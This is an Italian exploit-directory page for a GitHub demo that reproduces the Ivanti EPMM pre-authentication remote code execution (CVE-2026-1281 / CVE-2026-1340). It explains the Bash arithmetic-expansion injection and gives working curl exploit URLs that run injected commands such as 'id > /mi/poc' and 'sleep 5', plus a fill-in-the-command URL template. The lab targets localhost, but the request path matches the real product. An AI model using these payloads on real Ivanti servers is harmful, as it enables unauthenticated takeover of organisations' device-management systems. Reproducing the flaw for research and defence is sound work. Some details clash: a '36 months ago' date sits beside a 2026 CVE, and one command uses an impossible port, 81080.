Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2026-1281-CVE-2026-1340-Ivanti-EPMM-RCE — Una semplice applicazione demo che mostra come riprodurre la vulnerabilità RCE pre-autenticazione di Ivanti EPMM (CVE-2026-1281 / CVE-2026-1340) a scopo educativo e di ricerca sulla sicurezza. | Kitploit
Strumenti/GitHubGitHub/yunfeige18/cve-2026-1281-cve-2026-1340-ivanti-epmm-rce
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingApprendimento e Formazione
GitHubyunfeige18/cve-2026-1281-cve-2026-1340-ivanti-epmm-rce

CVE-2026-1281-CVE-2026-1340-Ivanti-EPMM-RCE

Una semplice applicazione demo che mostra come riprodurre la vulnerabilità RCE pre-autenticazione di Ivanti EPMM (CVE-2026-1281 / CVE-2026-1340) a scopo educativo e di ricerca sulla sicurezza.

Vedi Repository
36 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

Target fittizio per RCE pre-autenticazione Ivanti EPMM

Una semplice applicazione demo che mostra come riprodurre la vulnerabilità RCE pre-autenticazione Ivanti EPMM (CVE-2026-1281 / CVE-2026-1340) a scopo educativo e di ricerca sulla sicurezza.

Panoramica della vulnerabilità

Questa vulnerabilità sfrutta il comportamento dell'espansione aritmetica di Bash. Quando una variabile contenente un riferimento a un'altra variabile viene utilizzata in un contesto aritmetico, e la variabile referenziata contiene un indice di array con sostituzione di comando, il comando viene eseguito.

La catena di sfruttamento

  1. La richiesta contiene st=theValue (stringa letterale "theValue" con padding)
  2. La richiesta contiene h=gPath[\comando`]` (comando nell'indice dell'array)
  3. Lo script Bash analizza le coppie chiave=valore in un ciclo, aggiornando theValue a ogni iterazione
  4. gStartTime viene impostato sulla stringa letterale "theValue"
  • Dopo il ciclo, theValue contiene gPath[\comando`]`
  • Quando viene valutato [[ ${currentTime} -gt ${gStartTime} ]]:
    • ${gStartTime} → "theValue" (stringa)
    • Il contesto aritmetico tratta theValue come riferimento a variabile
    • theValue → gPath[\comando`]`
    • L'indice dell'array attiva la sostituzione di comando → RCE!
  • Avvio rapido

    root@kitploit:~
    # Compila e avvia il container
    docker-compose up --build -d
    
    # Verifica che sia in esecuzione
    curl http://localhost:8180/health
    

    Test della vulnerabilità

    1. Test di creazione file

    Crea un file per dimostrare l'esecuzione del comando:

    root@kitploit:~
    # Payload codificato in URL: id > /mi/poc
    curl "http://localhost:8180/mifs/c/appstore/fob/3/5/sha256:kid=1,st=theValue%20%20,et=1337133713,h=gPath%5B%60id%20%3E%20/mi/poc%60%5D/test.ipa"
    
    # Verifica se il file è stato creato
    cat artifacts/poc
    

    2. Test basato sul tempo

    Verifica con un comando sleep:

    root@kitploit:~
    # La risposta dovrebbe richiedere ~5 secondi
    time curl "http://localhost:81080/mifs/c/appstore/fob/3/5/sha256:kid=1,st=theValue%20%20,et=1337133713,h=gPath%5B%60sleep%205%60%5D/test.ipa"
    

    3. Esecuzione di comandi personalizzati

    root@kitploit:~
    # Scrivi contenuto personalizzato
    curl "http://localhost:8180/mifs/c/appstore/fob/3/5/sha256:kid=1,st=theValue%20%20,et=1337133713,h=gPath%5B%60echo%20PWNED%20%3E%20/mi/pwned%60%5D/test.ipa"
    
    cat artifacts/pwned
    

    Struttura dell'URL

    root@kitploit:~
    /mifs/c/appstore/fob/3/5/sha256:kid=1,st=theValue%20%20,et=1337133713,h=gPath%5B%60COMANDO%60%5D/uuid.ipa
                                   │      │              │              │
                                   │      │              │              └─ Payload: gPath[`COMANDO`]
                                   │      │              └─ Timestamp finale (10 cifre qualsiasi)
                                   │      └─ CRITICO: "theValue" letterale + 2 spazi (10 caratteri totali)
                                   └─ Indice chiave (qualsiasi valore)
    

    Debug

    root@kitploit:~
    # Visualizza i log del container
    docker-compose logs -f
    
    # Ottieni una shell nel container
    docker exec -it ivanti-epmm-vuln /bin/bash
    
    # Controlla i log degli errori di nginx
    docker exec -it ivanti-epmm-vuln cat /var/log/nginx/error.log
    

    Pulizia

    root@kitploit:~
    docker-compose down
    rm -rf artifacts/*
    

    Riferimenti

    • Articolo del blog WatchTowr Labs

    Disclaimer

    Questo strumento è destinato esclusivamente a test di sicurezza autorizzati e a scopo educativo. Non utilizzarlo contro sistemi di cui non sei proprietario o per i quali non hai esplicita autorizzazione al test.

    Scarica lo strumento